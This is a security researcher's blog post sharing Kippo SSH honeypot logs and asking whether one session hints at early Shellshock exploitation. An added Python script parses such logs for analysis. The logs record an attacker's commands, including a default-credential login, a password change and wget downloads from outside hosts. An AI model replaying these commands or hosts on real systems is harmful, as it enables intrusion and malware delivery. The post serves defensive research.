Was #ShellShock being exploited on select systems for years?

The following logs are from a Kippo SSH Honeypot.

Out of all my logs from running the honeypot for several years, I only saw "unhandled request for env" once.

I can't explain what caused it to appear in the log. I highlighted the section with hash marks below. Can anyone explain what causes it? Google searches for this string return rather limited results with no clear explanation.

If you can shed light on the subject, please send me a message on Twitter to @CaffSec

-Ken Buckler

Caffeine Security

Twitter: @CaffSec

caffeinesecurity.blogspot.com

A few more details...

-The IP address, 88.191.160.75, was never seen on my honeypot again.

-A VirusTotal analysis of the malware can be found here: https://www.virustotal.com/en/file/c6b14dd53de4a5050bae1fb97fb99fa104e721b04beca496637102d0b36534f7/analysis/1412124814/

2013-06-09 10:31:40-0400 [SSHService ssh-userauth on HoneyPotTransport,215,88.191.160.75] postgres trying auth none

2013-06-09 10:31:41-0400 [SSHService ssh-userauth on HoneyPotTransport,215,88.191.160.75] postgres trying auth keyboard-interactive

2013-06-09 10:31:43-0400 [SSHService ssh-userauth on HoneyPotTransport,215,88.191.160.75] login attempt [postgres/postgres] succeeded

2013-06-09 10:31:43-0400 [SSHService ssh-userauth on HoneyPotTransport,215,88.191.160.75] postgres authenticated with keyboard-interactive

2013-06-09 10:31:43-0400 [SSHService ssh-userauth on HoneyPotTransport,215,88.191.160.75] starting service ssh-connection

2013-06-09 10:31:44-0400 [SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] got channel session request

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] channel open

2013-06-09 10:31:44-0400 [SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] got global no-more-sessions@openssh.com request

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] pty request: xterm (26, 79, 0, 0)

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Terminal size: 26 79

###############################################

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] unhandled request for env

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] getting shell

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Opening TTY log: log/tty/20130609-103144-3972.log

###############################################

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] /etc/motd resolved into /etc/motd

2013-06-09 10:31:58-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: uname -a

2013-06-09 10:31:58-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command found: uname -a

2013-06-09 10:32:06-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: passwd

2013-06-09 10:32:06-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command found: passwd

2013-06-09 10:32:11-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] INPUT (passwd): k0k0lino

2013-06-09 10:32:13-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] INPUT (passwd): k0k0lino

2013-06-09 10:32:17-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: cd /tmp

2013-06-09 10:32:17-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command found: cd /tmp

2013-06-09 10:32:17-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: ls

2013-06-09 10:32:17-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command found: ls

2013-06-09 10:32:28-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: wget ftp://host-pride:host-pride@134.0.116.18/perl.txt

2013-06-09 10:32:28-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command found: wget ftp://host-pride:host-pride@134.0.116.18/perl.txt

2013-06-09 10:32:32-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: ftp

2013-06-09 10:32:32-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command not found: ftp

2013-06-09 10:32:54-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: wget moshu.do.am/bmoshu.jpg

2013-06-09 10:32:54-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command found: wget
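
An added example, not part of the original post and not Kippo's own code: a Python script that scans Kippo logs in the format shown above for sessions containing an "unhandled request for" line and lists the login and commands seen in each of those sessions. Session 215 in the sample is trimmed from the log above; session 7 (192.0.2.10) and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Kippo/Twisted line: "<timestamp> [<context> HoneyPotTransport,<session>,<ip>] <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d[+-]\d{4}) "
    r"\[.*?HoneyPotTransport,(?P<sid>\d+),(?P<ip>[0-9A-Fa-f.:]+)\] (?P<msg>.*)$")
UNHANDLED_RE = re.compile(r"^unhandled request for (\S+)")
LOGIN_RE = re.compile(r"^login attempt \[(.*)\] succeeded")

# Session 215 is trimmed from the log above; session 7 (192.0.2.10) is constructed.
SAMPLE_LOG = """\
2013-06-09 10:31:43-0400 [SSHService ssh-userauth on HoneyPotTransport,215,88.191.160.75] login attempt [postgres/postgres] succeeded
2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] pty request: xterm (26, 79, 0, 0)
2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] unhandled request for env
2013-06-09 10:31:58-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: uname -a
2013-06-09 10:32:06-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: passwd
2013-06-10 08:00:01-0400 [SSHService ssh-userauth on HoneyPotTransport,7,192.0.2.10] login attempt [root/123456] succeeded
2013-06-10 08:00:05-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,192.0.2.10] CMD: ls
"""

def summarize_sessions(log_text):
    """Group log lines by (ip, session id); collect logins, unhandled requests, commands."""
    sessions = defaultdict(lambda: {"first_seen": None, "logins": [], "unhandled": [], "cmds": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # blank lines, wrapped fragments, non-session output
        s = sessions[(m["ip"], int(m["sid"]))]
        s["first_seen"] = s["first_seen"] or m["ts"]
        msg = m["msg"]
        if (u := UNHANDLED_RE.match(msg)):
            s["unhandled"].append(u.group(1))
        elif (ok := LOGIN_RE.match(msg)):
            s["logins"].append(ok.group(1))
        elif msg.startswith("CMD: "):
            s["cmds"].append(msg[len("CMD: "):])
    return dict(sessions)

def sessions_with_unhandled(log_text, req_type="env"):
    """Return only the sessions that logged 'unhandled request for <req_type>'."""
    return {k: v for k, v in summarize_sessions(log_text).items() if req_type in v["unhandled"]}

if __name__ == "__main__":
    for (ip, sid), s in sessions_with_unhandled(SAMPLE_LOG).items():
        print(ip, sid, s["first_seen"], s["logins"], s["cmds"])
```

Wrapped log lines should be rejoined before scanning, since a command split across two lines is otherwise recorded only up to the break.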